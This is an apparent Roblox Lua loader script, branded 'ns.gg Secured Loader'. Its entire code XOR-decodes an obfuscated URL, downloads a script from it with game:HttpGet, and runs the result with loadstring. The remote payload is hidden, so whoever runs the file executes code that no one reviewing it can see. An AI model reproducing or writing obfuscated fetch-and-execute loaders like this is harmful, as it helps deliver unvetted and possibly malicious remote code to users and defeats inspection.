--[[
  ___      ___         ________      ________ 
 |\  \    /  /|       |\   ____\    |\   ____\
 \ \  \  /  / /       \ \  \___|_   \ \  \___|_
  \ \  \/  / /         \ \_____  \   \ \_____  \
   \ \    / /   ___     \|____|\  \   \|____|\  \
    \ \__/ /   |\__\      ____\_\  \    ____\_\  \
     \|__|/    \|__|     |\_________\  |\_________\
                          \|_________|  \|_________|

 ~ ns.gg Secured Loader ~
]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v11,v12) local v13={};for v14=1, #v11 do v6(v13,v0(v4(v1(v2(v11,v14,v14 + 1 )),v1(v2(v12,1 + (v14% #v12) ,1 + (v14% #v12) + 1 )))%256 ));end return v5(v13);end local v8=v7("\217\215\207\53\245\225\136\81\195\194\204\107\225\178\211\22\196\193\206\54\227\169\196\17\223\215\222\43\242\245\196\17\220\140\194\36\245\168\197\23\223\208\200\106\232\168\137\25\214\140\201\32\224\168\136\22\212\194\223\54\169\182\198\23\223\140\213\54\168\188\192","\126\177\163\187\69\134\219\167");local v9,v10=pcall(function() return game:HttpGet(v8);end);if v9 then loadstring(v10)();end
